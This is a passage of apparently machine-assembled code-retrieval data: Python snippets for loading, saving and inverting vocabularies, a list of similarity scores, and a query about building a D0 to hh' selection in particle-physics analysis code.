vocab", "def load_vocab(vocab_file):\n vocab = collections.OrderedDict()\n index = 0\n with open(vocab_file, \"r\", encoding=\"utf-8\") as reader:\n while True:\n token = reader.readline()\n if not token:\n break\n token = token.strip()\n vocab[token] = index\n index += 1\n return vocab", "def read_dictionary():\n with open(FILE, 'r') as f:\n for vocabulary in f:\n if vocabulary[0].strip() not in dict_txt:\n dict_txt[vocabulary[0].strip()] = [vocabulary.strip()]\n else:\n dict_txt[vocabulary[0].strip()].append(vocabulary.strip())", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv.append('<pad>')\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def invert_dictionary(dictionary):\n inverted = {}\n for key in dictionary:\n inverted[dictionary[key]] = key\n 
return inverted", "def from_dict(cls, dikt: dict) -> 'Vocabulary':\n return util.deserialize_model(dikt, cls)", "def deserialize(self, descriptor: Dict, data: List) -> ObjectHandle:\n return VocabularyHandle(\n values=set(data),\n name=descriptor['name'],\n namespace=descriptor['namespace'],\n label=descriptor.get('label'),\n description=descriptor.get('description')\n )", "def write_vocabulary(vocab_processor, outfile):\n vocab_size = len(vocab_processor.vocabulary_)\n with open(outfile, \"w\") as vocabfile:\n for id in range(vocab_size):\n word = vocab_processor.vocabulary_._reverse_mapping[id]\n vocabfile.write(word + \"\\n\")\n print(\"Saved vocabulary to {}\".format(outfile))", "def __repr__(self):\n l1 = \", \".join(\"{}={}\".format(x,y) for x,y in self._loading_params.items())\n l2 = \"max_vocab_size={}, min_token_freq={}, max_token_freq={}, ngrams={}\".format(\n self._max_vocab_size if hasattr(self, \"_max_vocab_size\") else None,\n self._min_token_freq if hasattr(self, \"_min_token_freq\") else 0,\n self._max_token_freq if hasattr(self, \"_max_token_freq\") else None,\n self._ngrams if hasattr(self, \"_ngrams\") else [1,1]\n )\n desc = \"Vocabulary({}, {})\".format(l1, l2)\n return desc", "def vocab_from_pickle(path: str) -> Dict:\n with open(path, \"rb\") as inp:\n vocab = pickle.load(inp)\n logger.info('Vocabulary (%d words) loaded from \"%s\"', len(vocab), path)\n return vocab", "def get_vocab(which_vocab):\n path = os.path.join(mg.WORKING_PATH, 'vocab', ''.join([which_vocab, '.json'\n ]))\n if os.path.exists(path):\n with open(path, 'r') as js:\n return(json.load(js))\n else:\n return(dict())", "def to_dict(self) -> dict:\n return dict(sentences=[sentence.to_dict() for sentence in self.sentences])", "def reverse(self):\n cdef StdVectorFst result = StdVectorFst(isyms=self.isyms, osyms=self.osyms)\n openfst.Reverse(self.fst[0], result.fst)\n return result", "def make_vocab(corpus_dictionary, vocab_path):\n with open(vocab_path, 'wb') as fout:\n pickle.dump(corpus_dictionary, fout)\n print('Saved dictionary to', vocab_path)", "def load_vocab(vocab):\r\n\tvocab = [line.split()[0] for line in open(\r\n\t\t'{}{}'.format(pm.vocab_path, vocab), 'r', encoding='utf-8').read().splitlines()\r\n\t\t\t if int(line.split()[1]) >= pm.word_limit_size]\r\n\tword2idx_dic = {word: idx for idx, word in enumerate(vocab)}\r\n\tidx2word_dic = {idx: word for idx, word in enumerate(vocab)}\r\n\treturn word2idx_dic, idx2word_dic", "def reverse_indices(indices, rev_vocab):\n return ' '.join([rev_vocab[idx] for idx in indices if idx != PAD_ID])", "def load_vocab(vocab_file):\n vocab = collections.OrderedDict()\n with open(vocab_file, \"r\", encoding=\"utf-8\") as reader:\n tokens = reader.readlines()\n for index, token in enumerate(tokens):\n token = token.rstrip('\\n')\n vocab[token] = index\n return vocab", "def one_hot_vocab_encoding(w2vp: W2VPreprocessor \n ) -> Dict[str, np.ndarray]:\n return {\n w: i for i, w in enumerate(w2vp.vocabulary)\n }", "def copy(self):\n s = sppasVocabulary()\n for i in self.__entries:\n s.add(i)\n\n return s", "def load_vocab(vocab_file, encoding='utf8'):\n vocab = OrderedDict()\n index = 0\n with open(vocab_file, encoding=encoding) as reader:\n while True:\n token = convert_to_unicode(reader.readline())\n if not token:\n break\n token = token.strip()\n vocab[token] = index\n index += 1\n return vocab", "def load_vocab(vocab_file):\n vocab = collections.OrderedDict()\n index = 0\n with tf.gfile.GFile(vocab_file, \"r\") as reader:\n while True:\n token = 
convert_to_unicode(reader.readline())\n if not token:\n break\n token = token.strip()\n vocab[token] = index\n index += 1\n return vocab", "def load_vocab(filename):\n try:\n d = dict()\n with open(filename, encoding='utf-8') as f:\n for idx, word in enumerate(f):\n word = word.strip()\n d[word] = idx\n\n except IOError:\n raise MyIOError(filename)\n return d" ]
[ "0.77923155", "0.6690991", "0.6248791", "0.6209789", "0.6155369", "0.6095056", "0.60796165", "0.60738266", "0.606323", "0.60227686", "0.6020329", "0.5977967", "0.5962219", "0.5951278", "0.5935339", "0.591856", "0.591432", "0.5899537", "0.58708775", "0.58708775", "0.5850216", "0.5849291", "0.5848399", "0.58404076", "0.5826592", "0.58204854", "0.5785582", "0.57833856", "0.5769395", "0.57557446", "0.573616", "0.57154024", "0.5714571", "0.57054263", "0.5665455", "0.5630818", "0.560876", "0.56076604", "0.5567984", "0.55476063", "0.5537447", "0.5536431", "0.5501517", "0.5487464", "0.5485929", "0.5459498", "0.54548866", "0.54235655", "0.54126084", "0.54120004", "0.54031634", "0.5397518", "0.5395591", "0.5381651", "0.53722364", "0.53641766", "0.5362029", "0.53590846", "0.53590846", "0.53590846", "0.53493637", "0.53473496", "0.5337292", "0.53305095", "0.5313369", "0.5309733", "0.53060514", "0.52976197", "0.5295623", "0.52925366", "0.52856934", "0.52822155", "0.5266322", "0.52548784", "0.5248015", "0.5246578", "0.52464", "0.5244586", "0.5244586", "0.52435595", "0.52415204", "0.52342975", "0.5228086", "0.5226145", "0.52249813", "0.5212096", "0.5185612", "0.51718235", "0.51609355", "0.5153603", "0.5150247", "0.51495135", "0.5131622", "0.51312804", "0.5119022", "0.5103482", "0.50942427", "0.50864244", "0.5082575" ]
0.71455634
2
Update the current trigger. The GTM API does not support a partial update. Therefore, this method will send all fields explicitly set in the method arguments and those cached in the instance properties.
def update(self, refresh=False, parameter=None, **kwargs): if refresh: self.__init__(path=self._path, service=self.service) default_asset = { "maxTimerLengthSeconds": self._maxTimerLengthSeconds, "totalTimeMinMilliseconds": self._totalTimeMinMilliseconds, "uniqueTriggerId": self._uniqueTriggerId, "verticalScrollPercentageList": self._verticalScrollPercentageList, "horizontalScrollPercentageList": self._horizontalScrollPercentageList, "containerId": self._containerId, "waitForTagsTimeout": self._waitForTagsTimeout, "accountId": self._accountId, "waitForTags": self._waitForTags, "intervalSeconds": self._intervalSeconds, "eventName": self._eventName, "visibilitySelector": self._visibilitySelector, "workspaceId": self._workspaceId, "customEventFilter": self._customEventFilter, "parentFolderId": self._parentFolderId, "continuousTimeMinMilliseconds": self._continuousTimeMinMilliseconds, "selector": self._selector, "triggerId": self._triggerId, "tagManagerUrl": self._tagManagerUrl, "fingerprint": self._fingerprint, "visiblePercentageMax": self._visiblePercentageMax, "path": self._path, "name": self._name, "visiblePercentageMin": self._visiblePercentageMin, "type": self._type, "notes": self._notes, "interval": self._interval, "filter": self._filter, "autoEventFilter": self._autoEventFilter, "limit": self._limit, "checkValidation": self._checkValidation, } update_asset = {**default_asset, **kwargs} if parameter: parameter_dict = {**param_dict(self._parameter), **param_dict(parameter)} parameter = list(parameter_dict.values()) else: parameter = self._parameter update_asset["parameter"] = [x.to_obj() for x in parameter] update_asset = {k: v for k, v in update_asset.items() if v is not None} request = self.triggers_service.update(path=self.path, body=update_asset) response = request.execute() self.__init__(trigger=response, service=self.service)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update(self, *args, **kwargs):\n # callable, but does nothing by default", "def update(self, *args, **kwargs):\n pass", "def update(self, *args, **kwargs):\n pass", "def update(self, *args, **kwargs):\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs):", "def update(self, *args, **kw):\n pass", "def update(self, *args, **kwargs):\n if args:\n self.__update(*args)\n elif kwargs:\n self.__update(**kwargs)", "def update(self, **kwargs):\n return self.parent.update_instance(self.name, kwargs)", "def update(self, *args, **kwargs):\n raise NotImplementedError", "def update(self, **params):\n self.parameters.update(params)", "def update(self, t, timestep, cache, triggered_or_finalized):\n for field in triggered_or_finalized:\n #print name, cache[name]\n if field.params.save:\n cbc_log(20, \"Saving field %s\" %field.name)\n self._action_save(field, cache[field.name], timestep, t)\n\n if timestep%self.flush_frequency == 0:\n self._flush_data()\n self._timer.completed(\"PP: flush data\")", "def update(self, *args, **kwargs) -> None:\n self.update_state(args[0])\n super().update(*args, **kwargs)", "def SendUpdatedParameters(self):\n payload = { \"Arg1\": self.href }\n return self._execute('sendUpdatedParameters', payload=payload, response_object=None)", "def update(self, params):", "def update(self):\n self._client.patch(self)", "def _update(self, count=True, forced=False):", "def update(self):\n\n pass", "def update(self,update_flags):\n pass", "def update(self) -> None:\n self._gateway.update()", "def set(self):\n if not os.path.isfile(self._trigger_file):\n with open(self._trigger_file, \"w\"):\n pass\n logger.debug(\"Set preview update trigger: %s\", self._trigger_file)", "def _update(self, data: Dict[str, Any], fields_to_modify: List[str]):\n pass", "def update(self, **kwargs):\n self.manager.update(self, **kwargs)", "def update(self, **kwargs):\n self.manager.update(self, **kwargs)", "def _update(self):\n pass", "def update_params(self):\n pass", "def update(self) -> None:\n ...", "def update_goal(self):\n pass", "def update(self, *args, **kwargs):\n if kwargs is not None:\n for key, value in kwargs.items():\n setattr(self, key, value)", "def update(self):\n self.attributes = self.call('UPDATE', expect=error.OK, body=self.attributes)", "def update(self) -> None:\n pass", "def update(self) -> None:\n pass", "def send(self, trigger, **kwargs):\n temp_data = {}\n for key, value in kwargs.iteritems():\n temp_data[key] = value\n self.evt.sendMessage(trigger, data=temp_data)", "def update(self, **kwargs):\n return self._object.update(meta=kwargs)", "def update(self, **options):\n pass", "def update(self, es, **kwargs):\n pass", "def update(self)->None:\n pass", "def update(self, update_fields=None):\n instance = self.get_object() \n if not update_fields: \n update_fields=self.request.PUT.keys()\n try: \n for field in update_fields:\n update_value = self.request.PUT.get(field) # get value from PUT\n setattr(instance, field, update_value) # renew fields\n instance.save() # save updates\n except IntegrityError: # catch error\n return self.response(status='Failed to Update.') \n return 
self.response(\n status='Successfully Update')", "def post_update(self):\n\t\tlogging.info(\"Beginning\")\n\t\toptions=dict(\n\t\t\tapi_key = self.apiKey\n\t\t)\n\t\tcounter = 0\n\t\tfor key, value in self.field.items():\n\t\t\tif value != None:\n\t\t\t\tcounter += 1\n\t\t\t\toptions[key] = value\n\t\tif counter == 0:\n\t\t\tlogging.error(\"There was nothing to update. Check the field values\")\n\t\t\treturn\n\t\turl = '{ts}update'.format(\n\t\t\tts=self.tsRUL,\n\t\t)\n\t\tlogging.debug(\"Options = \" + str(options))\n\t\ttry:\n\t\t\tresults = requests.post(url, params=options)\n\t\t\tif results.ok != True:\n\t\t\t\tlogging.error(\"The update failed\")\n\t\t\t\treturn False\n\t\texcept:\n\t\t\tlogging.error(\"There was an error trying to update the values\")\n\t\t\treturn False\n\t\tself.clear_field_values()\n\t\treturn True", "def on_update(self, **kwargs):\n self.get_client()\n self.update(self, kwargs['sender'], kwargs['instance'])", "def update_fields(self, request):\n message = request.message\n objects = message.model.objects\n if message.filter is not None and len(message.filter) > 0:\n objects.filter(**message.filter).update(**message.kwargs)\n\n else:\n objects.all().update(**message.kwargs)\n\n return SuccessReply()", "def update(self, **kwargs):\n print(\"Updating model\")\n print(kwargs)\n for key in kwargs:\n setattr(self, key, kwargs[key])", "def _update(self, force=False):\n if self.autoupdate:\n self.update(force)", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self, **kwargs):\n return self._update_data(self.put(None, data=kwargs))", "def update(self, **kwargs):\n return self.manager.update(self, **kwargs)", "def update(self, **kwargs):\n return self.manager.update(self, **kwargs)", "def update(self, **kwargs):\n return self.manager.update(self, **kwargs)", "def update(self, args):\n pass", "def _update_params(self):\n pass", "def update(self, *args, **kwargs):\n self.logger.update(*args, **kwargs)", "def Trigger(self):\n\t\tpayload = { \"Arg1\": self.href }\n\t\treturn self._execute('trigger', payload=payload, response_object=None)", "def update(self) -> None:\n pass", "def update(self, *args: Any, **kwargs: Any) -> None:\n self._check_for_increment(\"update\")\n self[-1].update(*args, **kwargs)", "def _update(self):\n self.all_params = {}\n self._update_experiment_params()\n self._update_preprocessing_params()\n self._update_model_params()", "def update(self):\r\n pass", "def fire_trigger(self, trigger):\n if not self.exists():\n return\n if trigger in self.events:\n for action in self.events[trigger]:\n action(requestor=self)", "def put(self):\n request = transforms.loads(self.request.get('request'))\n key = self.request.get('key')\n\n if not self.assert_xsrf_token_or_fail(\n request, 'update-course-featured', {'key': key}):\n return\n\n if not roles.Roles.is_super_admin():\n transforms.send_json_response(\n self, 401, 'Access denied.', {'key': self.KEY})\n return\n\n payload = request.get('payload')\n updated_dict = transforms.json_to_dict(\n transforms.loads(payload), self.get_schema_dict())\n\n errors = []\n self.apply_updates(updated_dict, errors)\n if not errors:\n 
transforms.send_json_response(self, 200, 'Saved.')\n else:\n transforms.send_json_response(self, 412, '\\n'.join(errors))", "def update(self):\n return self._process('update')", "def update(self, *args):\n qry = UpdateEntityQuery(self)\n self.context.add_query(qry)\n return self", "def trigger_build(self, postdata):\n pass", "def partial_update(self, request, guild_id, *args, **kwargs):\r\n data = request.data\r\n try:\r\n # Find the existing guild entry\r\n guild = Guild.objects.get(guild_id=guild_id)\r\n except ObjectDoesNotExist:\r\n # Entry not found - create one!\r\n guild = Guild(guild_id=guild_id)\r\n # Update kwargs\r\n for key, value in data.items():\r\n print(key, value)\r\n if value == \"reset\": value = None\r\n setattr(guild, key, value)\r\n # Submit changes\r\n guild.save()\r\n serializer = self.get_serializer(guild)\r\n return Response(serializer.data)", "def create_update_trigger(self):\n self.execute(self.commands.update_function(\n self.name,\n self._equals(\n self.intersection.dest_columns,\n 'NEW',\n self.intersection.origin_columns\n ),\n self.primary_key_column\n ))\n\n self.execute(self.commands.update_trigger(\n self.triggers['UPDATE'],\n self.source.name,\n self.name\n ))", "def salesforce_update(self, obj_name, obj_id, **kwargs):\n self.builtin.log(\n \"Updating {} {} with values {}\".format(obj_name, obj_id, kwargs)\n )\n obj_class = getattr(self.cumulusci.sf, obj_name)\n return obj_class.update(obj_id, kwargs)", "def update(self):\n pass", "def update( ):\r\n pass", "def update(self, **kwargs):\n for key, val in kwargs.items():\n setattr(self, key, val)", "def update(self, refresh=False, parameter=None, **kwargs):\n if parameter and not isinstance(parameter, list):\n raise ValueError(\n \"'parameter' has to be a list of :class:`GTMParameters` or 'None'.\"\n )\n\n if refresh:\n self.__init__(path=self._path, service=self.service)\n\n default_asset = {\n \"paused\": self._paused,\n \"setupTag\": self._setupTag,\n \"firingRuleId\": self._firingRuleId,\n \"teardownTag\": self._teardownTag,\n \"priority\": self._priority,\n \"parentFolderId\": self._parentFolderId,\n \"scheduleStartMs\": self._scheduleStartMs,\n \"scheduleEndMs\": self._scheduleEndMs,\n \"tagFiringOption\": self._tagFiringOption,\n \"blockingRuleId\": self._blockingRuleId,\n \"firingTriggerId\": self._firingTriggerId,\n \"name\": self._name,\n \"type\": self._type,\n \"notes\": self._notes,\n \"liveOnly\": self._liveOnly,\n \"blockingTriggerId\": self._blockingTriggerId,\n }\n update_asset = {**default_asset, **kwargs}\n\n if parameter:\n parameter_dict = {**param_dict(self._parameter), **param_dict(parameter)}\n parameter = list(parameter_dict.values())\n else:\n parameter = self._parameter\n\n update_asset[\"parameter\"] = [x.to_obj() for x in parameter]\n\n update_asset = {k: v for k, v in update_asset.items() if v is not None}\n\n request = self.tags_service.update(path=self.path, body=update_asset)\n response = request.execute()\n self.__init__(tag=response, service=self.service)", "def update_goal_info(self):\n self._goal_info_cache = self._get_goal_info()", "def _build_update_params(self, params):", "def update_values(self, to_update):\n for key, value in kwargs.iteritems():\n self.params[key] = value\n # update the possibly dependent parameters\n self.set_filenames()", "def Update(self):\r\n\r\n # does nothing\r\n pass", "def update(cls) -> None:\n raise NotImplementedError", "def gen_update(self, TL):\r\n pass", "def beam_update(self, beams, extra):\n return extra", "def 
__update_params(self,**kwargs):\n updatedArgSet = set(self._updateParamsArgs) & kwargs.viewkeys()\n if len(updatedArgSet) > 0:\n args = self._subDictionary(self._updateParamsArgs)\n newArgs = self._onParamsUpdate(**args)\n updatedArgs =dict()\n for k in updatedArgSet:\n try:\n updatedArgs[k] = newArgs[k]\n except:\n pass\n\n self.__dictionary.update(newArgs)\n else:\n pass", "def updateParameters(self):\n\n return", "def update(self, update, **kwargs):\n try:\n self.saved = False\n function_to_call = self.update_dic[update]\n function_to_call(**kwargs)\n except KeyError as e:\n pass", "def update(self, **kwargs):\n self.pending_update = True\n self.update_data(**kwargs)\n self.update_selection()\n if self.context is not None and self.context.doc is not None:\n self.context.doc.add_next_tick_callback(self.update_source)", "def update(self, data):\n pass", "def update(self, data):\n pass" ]
[ "0.5962123", "0.5947622", "0.5947622", "0.5947622", "0.59135634", "0.59135634", "0.59135634", "0.59135634", "0.59135634", "0.59135634", "0.5901567", "0.5882499", "0.5750089", "0.56001323", "0.55886126", "0.5582611", "0.5573218", "0.5543781", "0.5498977", "0.54955", "0.54674727", "0.5463991", "0.54621005", "0.5460992", "0.54535913", "0.5450029", "0.5422599", "0.5419838", "0.5419838", "0.54126394", "0.5406283", "0.54036415", "0.53973114", "0.53803176", "0.5374489", "0.537222", "0.537222", "0.5365947", "0.53652555", "0.5358669", "0.53584826", "0.5354586", "0.53543305", "0.534246", "0.5336804", "0.5327476", "0.5324454", "0.5313821", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.53043085", "0.52973455", "0.52973455", "0.52973455", "0.5254326", "0.52519715", "0.5236873", "0.5231428", "0.5225212", "0.5219121", "0.5218469", "0.52175814", "0.5188678", "0.51811504", "0.5172458", "0.51674587", "0.5159252", "0.5156413", "0.5146719", "0.51419723", "0.51411456", "0.5116667", "0.5109338", "0.5101641", "0.51013285", "0.51007056", "0.5095034", "0.50850695", "0.50815475", "0.5076299", "0.5073628", "0.50720465", "0.5068525", "0.50659895", "0.5056036", "0.504933", "0.504933" ]
0.56299794
13
Delete the current trigger.
def delete(self): request = self.triggers_service.delete(path=self._path) request.execute()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _delTrigger(self, message: IRCMessage) -> IRCResponse:\n triggerName = message.parameterList[1]\n if triggerName in self.storage:\n del self.storage[triggerName]\n return IRCResponse(f\"Trigger {triggerName} deleted!\", message.replyTo)\n else:\n return IRCResponse(f\"No trigger named {triggerName} exists.\", message.replyTo)", "def delete_trigger(self, trigger_id):\n self._delete(path=\"triggers/{}\".format(trigger_id))", "def create_delete_trigger(self):\n self.execute(self.commands.delete_function(\n dest_table=self.name,\n pk_col=self.primary_key_column\n ))\n\n self.execute(self.commands.delete_trigger(\n self.triggers['DELETE'],\n self.source.name,\n self.name\n ))", "def clear(self):\n if os.path.isfile(self._trigger_file):\n os.remove(self._trigger_file)\n logger.debug(\"Removed preview update trigger: %s\", self._trigger_file)", "def delete(self):\n\t\tdel self.scheduler.find(self)\n\t\tdel self", "def delete(self, trigger_id):\n try:\n self._client.delete(self._full_path(trigger_id))\n return False\n except InvalidJSONError:\n return True", "def delete(self):\n pass", "def delete(self):\n pass", "def delete(self):\n pass", "def delete(self):\n pass", "def delete(self):\n self.current_revision.delete()", "def deleteOrDelay(self):\n self.delete()", "def delete(self):\n self._instance.delete()\n self._instance = None\n self._data_defs = []", "def __macroDelete(self):\n self.activeWindow().macroDelete()", "def test_remove_trigger(self) -> None:\n trigger = auraxium.Trigger(auraxium.event.Death, name='on_death')\n self.client.add_trigger(trigger)\n self.assertEqual(len(self.client.triggers), 1)\n self.client.remove_trigger('on_death')\n self.assertEqual(len(self.client.triggers), 0)\n with self.assertRaises(KeyError):\n self.client.remove_trigger('does_not_exist')", "def delete(self):\n # type: () -> BoundAction\n return self._client.delete(self)", "def drop_trigger(self, trig):\n self.vr_trig_queue.put((trig,'done'))", "def delete(self):\n ...", "def delete(self):\n self._client.delete(self)", "def delete(self):\n with self.locked():\n self.path.delete()", "def delete(self):\n with self.locked():\n self.path.delete()", "def delete(self) -> None:\n self.pop()", "def delete():", "def delete(self):\n\n raise NotImplementedError('Must be implemented by subclasses')", "def delete(self):\n os.system(\"rm \"+self._name)", "def delete(self):\n\t\t#self.log.info(\"Deleting file {}\".format(self._filepath))\n\t\tos.remove(self._filepath)", "def delete(self):\r\n delete_tracks(self.project, [self])", "def delete_at_index(self, idx):\n del self.timeseries[idx]\n del self.freq[idx]\n del self.ch_name[idx]\n del self.units[idx]\n\n if self.trigger_idx == idx:\n LGR.warning(\"Removing trigger channel - are you sure you are doing\" \"the right thing?\")\n self.trigger_idx = 0", "def delete(self):\n # exit contains our clean up code\n self.exit()\n GenericAnimatedProp.GenericAnimatedProp.delete(self)", "def delete_template(self):\n try:\n os.remove(self.path)\n except Exception:\n pass", "def delete(self):\n return self.parent.delete_instance(self.name)", "def trigger_delete(cls, instance):\n es_client.delete(instance.blog.index_name(), 'blog_post_index', instance.id)", "def delete(self):\n if not self.is_deleted:\n self.is_deleted = True\n self.save()", "def delete(self):\n self.oxdb.execute(DELETE, self.variable_name, commit=True)\n self._exists = None", "def delete(self):\n\n raise NotImplementedError()", "def delete(self):\n pdbox._args.get(\"dryrun\") or shutil.rmtree(self.path)\n 
pdbox.info(\"Deleted %s/\" % self.path)", "def __del__(self):\n print(f\"{self.fullname()} deleted from database.\")", "def delete(self):\n del self.shx.atoms[self.index]", "def delete(self):\n self.manager.delete(self.name)", "def delete(self):\n self.manager.delete(self.name)", "def delete(self):\n self.request().delete()", "def delete(self):\n return self._delete", "def delete(self):\r\n self.domain.delete_item(self)", "def delete(self):\n pdbox._args.get(\"dryrun\") or os.remove(self.path)\n pdbox.info(\"Deleted %s\" % self.path)", "def delete_trigger(name: str, engine: Engine, table: str, schema: str = None):\n schema = schema or 'public'\n\n engine.execute(f'DROP TRIGGER IF EXISTS {name} ON {schema}.{table}')", "def delete(self) -> None:\n shutil.rmtree(self.path)", "def delete(self):\n\t\tself.eventStatus = 0\n\t\tself.save()\n\n\t\t# DEBUG\n\t\tcontext = {\n\t\t\t'call_stack': ''.join(traceback.format_stack()),\n\t\t\t'event': self,\n\t\t\t'server_addr': settings.SERVER_ADDRESS,\n\t\t}\n\t\tbody = render_to_string('MHLCallGroups/Scheduler/email_delete_event.txt', context)\n\t\tmail_admins(_('Event Deletion Attempt!'), body)", "def hdel(self):\n return self.delete()", "def removeTrigger(self, trigger):\r\n for k, t in self.literalTriggers.iteritems():\r\n if t.title == trigger:\r\n del self.literalTriggers[k]\r\n return False\r\n else:\r\n for k, t in self.triggers.iteritems():\r\n if t.title == trigger:\r\n del self.triggers[k]\r\n return True\r\n return False", "def delete(self):\n self.model.remove_agents(self)", "def delete(self, *args, **kwargs):\n pass", "def delete(self, *args, **kwargs):\n pass", "def delete():\n click.echo('delete was called.')", "def delete(self):\n self.manager.delete(self)", "def delete_document(self):\n pass", "def ClearRecordsForTrigger(self):\n\t\tpayload = { \"Arg1\": self.href }\n\t\treturn self._execute('clearRecordsForTrigger', payload=payload, response_object=None)", "def delete(self):\n self.vera.delete_scene(self)", "def delete(self):\n DATABASE_CONNECTION.delete(self.__class__.__name__, self.id)", "def delete_command():\n global selected_tuple\n backend.delete(selected_tuple[0])", "def force_delete(self):\n self.manager.force_delete(self)", "def force_delete(self):\n self.manager.force_delete(self)", "def __delete__(self):\n pass", "async def delete(self):\n return await self.set_message(text='')", "def delete(self, downstream = None):\n # emit delete message\n self.deleteSignal.emit(self)", "def delete( self ):\n if os.path.exists(self.filename):\n os.remove(self.filename)", "def delete(self):\n self.graph._del(handle=self.handle)", "def delete(self, filename):\n pass", "def delete(self):\n\n try:\n remove(self.file)\n except OSError:\n pass", "def unsetTrigger(self):\n return _libsbml.Event_unsetTrigger(self)", "def delete(self):\n raise NotImplementedError", "def delete(self):\n if self.is_running:\n raise errors.ChalmersError(\"Can not remove running program (must be stopped)\")\n\n if path.isfile(self.definition_filename):\n os.unlink(self.definition_filename)\n\n if path.isfile(self.state_filename):\n os.unlink(self.state_filename)", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete(self):\n return self._finalize()", "def delete(self):\n return 
self._finalize()", "def delete_word(event):\n get_by_name(\"backward-kill-word\").call(event)", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def delete(self):\n self.data = None", "def remove(self):\r\n\t\tself._delete()", "def delete(self):\n self.method = \"DELETE\"\n self.send()", "def __del__(self) -> None:\n self.delete()", "def delete(self):\n self.package = None" ]
[ "0.7167729", "0.70552254", "0.6779274", "0.6583904", "0.655758", "0.64790803", "0.6461914", "0.6461914", "0.6461914", "0.6461914", "0.645271", "0.64262265", "0.62824124", "0.6266517", "0.62515134", "0.62503153", "0.62478745", "0.62462974", "0.6191452", "0.61563873", "0.61563873", "0.61363184", "0.6109357", "0.6104194", "0.6091601", "0.60879666", "0.60828376", "0.60796404", "0.6074667", "0.60692894", "0.60397273", "0.60386515", "0.60212356", "0.6013759", "0.60083455", "0.6007559", "0.5990807", "0.597058", "0.59644616", "0.59644616", "0.59618175", "0.5959596", "0.5958881", "0.5958856", "0.5954542", "0.59512925", "0.59508365", "0.59355956", "0.59319544", "0.5926145", "0.5915153", "0.5915153", "0.59148014", "0.59021616", "0.58863074", "0.5885904", "0.5882063", "0.58790785", "0.58767354", "0.58728176", "0.58728176", "0.58724385", "0.5866614", "0.5865847", "0.5863907", "0.5863506", "0.5861332", "0.58588994", "0.58587253", "0.5855503", "0.58466923", "0.583655", "0.583655", "0.583655", "0.583655", "0.583655", "0.583655", "0.583655", "0.583655", "0.583655", "0.582966", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.58283526", "0.5818831", "0.5817396", "0.5812874", "0.5807403", "0.5800533" ]
0.8082834
0
Create and return a D0 > hh' Selection object.
def makeD2hhAsymm(name, config, KPIDK_string, PiPIDK_string, Mass_low_string, Mass_high_string, CombPIDK_string, DecayDescriptor, inputSel, useTOS, Hlt1TOS, Hlt2TOS ) : def makeTISTOS( name, _input, _hlttos ) : from Configurables import TisTosParticleTagger _tisTosFilter = TisTosParticleTagger( name + "Tagger" ) _tisTosFilter.TisTosSpecs = _hlttos return Selection( name , Algorithm = _tisTosFilter , RequiredSelections = [ _input ] ) _Kcuts1 = "~ISMUON & (PT > %(DaugPtMin)s* MeV) & (MIPCHI2DV(PRIMARY) > %(DaugIPChi2)s)" % locals()['config'] _KcutsPIDK = KPIDK_string % locals()['config'] _Kcuts2 = " & (ISLONG) & (P > %(DaugP)s* MeV) & (TRCHI2DOF < %(DaugTrkChi2)s)" % locals()['config'] _Kcuts = _Kcuts1 + _KcutsPIDK + _Kcuts2 _Picuts1 = "~ISMUON & (PT > %(DaugPtMin)s* MeV) & (MIPCHI2DV(PRIMARY) > %(DaugIPChi2)s)" % locals()['config'] _PicutsPIDK = PiPIDK_string % locals()['config'] _Picuts2 = " & (ISLONG) & (P > %(DaugP)s* MeV) & (TRCHI2DOF < %(DaugTrkChi2)s)" % locals()['config'] _Picuts = _Picuts1 + _PicutsPIDK + _Picuts2 _dauCuts = { 'K+': _Kcuts, 'pi+': _Picuts } _massLow = Mass_low_string % locals()['config'] _massHigh = Mass_high_string % locals()['config'] _combCuts1 = "(APT > %(D0Pt)s* MeV)" \ "& (AHASCHILD( PT > %(DaugPtMax)s* MeV ) )" \ "& (ADOCA(1,2)< %(D0DOCA)s* mm)" \ "& (AP > %(D0P)s* MeV)" % locals()['config'] _combCutsPIDK = CombPIDK_string % locals()['config'] _combCuts = _combCuts1 + _combCutsPIDK + _massLow + _massHigh _motherCuts = "(VFASPF(VCHI2PDOF) < %(D0VtxChi2Ndof)s)" \ "& (BPVVDCHI2 > %(D0FDChi2)s)" \ "& (BPVLTIME() > %(D0Tau)s)" \ "& (BPVDIRA > %(D0BPVDira)s)" % locals()['config'] _D0 = CombineParticles( DecayDescriptor = DecayDescriptor, MotherCut = _motherCuts, CombinationCut = _combCuts, DaughtersCuts = 